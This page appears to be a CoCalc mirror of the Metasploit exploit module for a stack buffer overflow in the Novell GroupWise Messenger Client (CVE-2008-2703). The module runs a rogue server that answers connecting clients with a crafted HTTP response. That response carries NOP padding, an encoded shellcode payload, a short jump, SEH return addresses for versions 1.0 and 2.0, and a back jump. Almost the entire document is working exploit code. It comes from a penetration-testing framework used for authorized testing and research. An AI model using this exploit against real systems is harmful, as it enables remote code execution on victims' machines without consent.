Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/novell/groupwisemessenger_client.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Novell GroupWise Messenger Client Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.

18
          By sending a specially crafted HTTP response, an attacker may be able to execute

19
          arbitrary code.

20
        },

21
        'Author' => 'MC',

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2008-2703' ],

25
          [ 'OSVDB', '46041' ],

26
          [ 'BID', '29602' ],

27
          [ 'URL', 'http://www.infobyte.com.ar/adv/ISR-17.html' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
          'AllowWin32SEH' => true

32
        },

33
        'Payload' => {

34
          'Space' => 750,

35
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

36
          'DisableNops' => true,

37
          'StackAdjustment' => -3500,

38
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

39
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

40
        },

41
        'Platform' => 'win',

42
        'Targets' => [

43
          [ 'Novell GroupWise Messenger 2.0 Client', { 'Ret' => 0x502de115 } ],

44
          [ 'Novell GroupWise Messenger 1.0 Client', { 'Ret' => 0x1000e105 } ],

45
        ],

46
        'Privileged' => false,

47
        'DisclosureDate' => '2008-07-02',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 8300 ])

60
      ]

61
    )

62
  end

63


64
  def on_client_connect(client)

65
    return if ((p = regenerate_payload(client)) == nil)

66


67
    client.get_once

68


69
    date = Time.gm(2008, nil, nil, nil, nil, nil)

70
    rand_1 = rand_text_english(5)

71
    rand_2 = rand_text_english(4)

72
    rand_3 = rand_text_english(rand(8) + 1)

73
    rand_4 = rand_text_alpha_upper(8)

74
    rand_5 = rand_text_english(3)

75


76
    res = "HTTP/1.0 200\r\n"

77
    res << "Date: #{date}\r\n"

78
    res << "Pragma: no-cache\r\n"

79
    res << "Cache-Control: no-cache\r\n\r\n"

80
    res << "\n\0\20\0\0\0nnmFileTransfer\0\2\0\0\x000\0\n\0\t\0\0\0"

81
    res << "nnmQuery\0\2\0\0\x001\0\n\0\13\0\0\0nnmArchive"

82
    res << "\0\2\0\0\x001\0\n\0\24\0\0\0nnmPasswordRemember"

83
    res << "\0\2\0\0\x001\0\n\0\17\0\0\0nnmMaxContacts"

84
    res << "\0\4\0\0\x00150\0\n\0\16\0\0\0nnmMaxFolders"

85
    res << "\0\3\0\0\x0050\0\n\0\r\0\0\0nnmBroadcast"

86
    res << "\0\2\0\0\x001\0\n\0\23\0\0\0nnmPersonalHistory"

87
    res << "\0\2\0\0\x001\0\n\0\r\0\0\0nnmPrintSave"

88
    res << "\0\2\0\0\x001\0\n\0\17\0\0\0nnmChatService"

89
    res << "\0\2\0\0\x001\0\n\0\3\0\0\0CN\0\a\0\0\0ISR000"

90
    res << "\0\n\0\b\0\0\0Surname\0\6\0\0\0#{rand_1}\0\n\0\n\0\0\0"

91
    res << "Full Name\0\20\0\0\0Client Name    \0\n\0\13\0\0\0Given Name"

92
    res << "\0\n\0\0\0Client   \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0"

93
    res << "NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave"

94
    res << "\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY"

95
    res << "\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0#{rand_1}\@#{rand_4}.#{rand_5}.xx"

96
    res << "\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0"

97
    res << "CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=#{rand_4}XX"

98
    res << "\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0"

99
    res << "nnmClientDownload\0\2\0\0\x000\0\b\0\22\0\0\0NM_A_UD_KEEPALIVE"

100
    res << "\0\n\0\0\0\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0"

101
    res << "NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0"

102


103
    res << "HTTP/1.0 200\r\n"

104
    res << "Date: #{date}\r\n"

105
    res << "Pragma: no-cache\r\n"

106
    res << "Cache-Control: no-cache\r\n\r\n"

107
    res << "\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0"

108
    res << "NM_A_SZ_TRANSACTION_ID\0\2\0\0\x00#{rand_2}\0\0"

109
    res << make_nops(805 - payload.encoded.length) + payload.encoded

110
    res << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')

111
    res << [0xe9, -800].pack('CV') + rand_text_english(5000 - payload.encoded.length)

112


113
    print_status("Sending #{self.name} to #{client.peerhost}:#{client.peerport}...")

114
    client.put(res)

115
    handler(client)

116


117
    select(nil, nil, nil, 2)

118
    service.close_client(client)

119
  end

120
end

121


122